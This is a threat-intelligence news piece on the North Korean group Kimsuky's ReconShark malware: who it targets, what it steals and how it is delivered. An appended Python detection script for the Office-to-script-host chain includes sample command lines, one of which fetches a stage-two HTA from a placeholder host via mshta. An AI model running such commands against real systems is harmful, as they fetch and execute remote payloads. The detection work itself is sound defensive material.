
Kimsuky Enhances its BabyShark Recon Tool in a Global Campaign

The North Korean-linked hacker group Kimsuky, aka Thallium, SmokeScreen, and Velvet Chollima, has once again exhibited its zeal for trying new tools and tactics. It has come up with a new reconnaissance tool called ReconShark. Moreover, to lure its global victims, it is using various geopolitical current affairs, such as nuclear agendas between China and North Korea and the Russia-Ukraine conflict.

Who is being targeted?

SentinelLabs reported that in the recent campaign, Kimsuky is targeting organizations across the globe.
  • One of its targets includes the staff of Korea Risk Group (KRG), an IT firm dealing with the analysis of matters impacting the Democratic People’s Republic of Korea (DPRK).
  • The same campaign has been further expanded to target government entities, think tanks, and research universities in the U.S., Europe, and Asia.

About the ReconShark

Kimsuky has upgraded its BabyShark malware into ReconShark, further expanding its exfiltration capabilities.
  • It can steal sensitive data from the infected system, including running processes, connected batteries, and endpoint threat detection mechanisms.
  • It further abuses the Windows Management Instrumentation (WMI) to extract system information.
  • It checks for the presence of endpoint security software, including Trend Micro OfficeScan, Kaspersky Internet Security, Malwarebytes Anti-Malware, and Norton Security.
  • Additionally, ReconShark fetches further payloads from the C2 and deploys them via scripts (HTA, Windows Batch, or VBS) or macro-enabled Office documents.
  • The malware is delivered to the targeted individuals via spear-phishing emails, OneDrive links pointing toward malicious documents, or malicious macros.
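Detection logic for the delivery and reconnaissance chain described above (an Office document launching an HTA, Batch or VBS script host, which then fetches remote content and enumerates the system through WMI), added here as an example and not code from SentinelLabs or from the original article. The Sysmon-style event format, host names, URL and command lines are constructed assumptions.

```python
"""Flag process-creation events matching the ReconShark delivery and recon
chain: Office -> script host (mshta/cmd/wscript/cscript) -> remote content and
WMI enumeration. Events are constructed, Sysmon-like dicts, not real telemetry."""
from collections import defaultdict

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Map each script host to the script type named in the report.
SCRIPT_HOSTS = {"mshta.exe": "HTA", "cmd.exe": "Batch",
                "wscript.exe": "VBS", "cscript.exe": "VBS"}
WMI_TOOLS = {"wmic.exe"}


def classify(event):
    """Return the list of finding tags for one process-creation event."""
    parent = event["parent_image"].rsplit("\\", 1)[-1].lower()
    image = event["image"].rsplit("\\", 1)[-1].lower()
    cmdline = event["command_line"].lower()
    findings = []
    if parent in OFFICE and image in SCRIPT_HOSTS:          # macro doc -> script
        findings.append(f"office-spawned-{SCRIPT_HOSTS[image].lower()}")
    if image in WMI_TOOLS and parent in SCRIPT_HOSTS:       # script -> WMI recon
        findings.append("script-host-wmi-enumeration")
    if image in SCRIPT_HOSTS and ("http://" in cmdline or "https://" in cmdline):
        findings.append("script-host-remote-content")      # payload fetch from C2
    return findings


def analyze(events):
    """Aggregate distinct findings per host; two or more on one host means the
    chain matched end to end and the host should be escalated."""
    per_host = defaultdict(set)
    for ev in events:
        per_host[ev["host"]].update(classify(ev))
    return {h: sorted(f) for h, f in per_host.items()}


SAMPLE_EVENTS = [  # constructed sample telemetry; URL and hosts are placeholders
    {"host": "ws01", "parent_image": "C:\\Program Files\\Microsoft Office\\WINWORD.EXE",
     "image": "C:\\Windows\\System32\\mshta.exe",
     "command_line": "mshta.exe https://example.invalid/stage2.hta"},
    {"host": "ws01", "parent_image": "C:\\Windows\\System32\\mshta.exe",
     "image": "C:\\Windows\\System32\\wbem\\WMIC.exe",
     "command_line": "wmic process list brief"},
    {"host": "ws02", "parent_image": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\cmd.exe", "command_line": "cmd.exe /c dir"},
]

if __name__ == "__main__":
    for host, findings in analyze(SAMPLE_EVENTS).items():
        print(host, "ESCALATE" if len(findings) >= 2 else "ok", findings)
```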

Concluding notes

In addition to data exfiltration, Kimsuky has equipped ReconShark with additional capabilities to detect security software and hardware information. This allows it to target its victims with enhanced precision by exploiting the platform's vulnerabilities and evading defenses. For protection against this threat, the best bet is securing critical assets and staying aware of the latest tactics used by the adversary.
Cyware Publisher
